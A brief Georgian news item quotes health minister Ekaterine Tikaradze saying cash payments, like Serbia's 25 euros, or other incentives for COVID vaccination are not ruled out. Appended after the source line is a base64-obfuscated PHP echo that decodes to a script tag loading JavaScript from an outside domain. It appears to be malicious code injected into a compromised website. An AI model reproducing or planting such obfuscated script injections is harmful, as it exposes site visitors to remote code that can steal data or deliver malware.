celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე არ გამორიცხავს, რომ ვაქცინაციის წასახალისებლად მოქალაქეებს თანხა გადაუხადონ, ან სხვა მსგავსი წამახალისებელი ღონისძიება გამოიყენონ.
 
ჟურნალისტის კითხვას, ხომ არ გამოიყენებენ ვაქცინაციის წამახალისებლად მოქალაქეებისთვის თანხის გადახდის ინსტრუმენტს, როგორც სერბეთში უხდიან აცრაში 25 ევროს, ტიკარაძე ასე პასუხობს:
 
“სხვადასხვა ინსტრუმენტები გამოიყენება სხვადასხვა ქვეყნის მხრიდან. ამ ღონისძიებებს ვაკვირდებით და ასევე ვაკვირდებით მათ ეფექტურობასაც. მე არ გამოვრიცხავ, რომ შეიძლება ჩვენ მსგავს ხერხსაც მივმართოთ, თუმცა იქნება ეს 25 ევრო, ლარი თუ რამე სხვა წამახალისებელი ღონისძიება ჩვენი მოქალაქეებისთვის, საბჭომ ერთობლივად უნდა მიიღოს ასეთი გადაწყვეტილება”, – განაცხადა ეკატერინე ტიკარაძემ რუსთავი 2-ის ეთერში.
 
 
წყარო: რუსთავი 2
1983
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");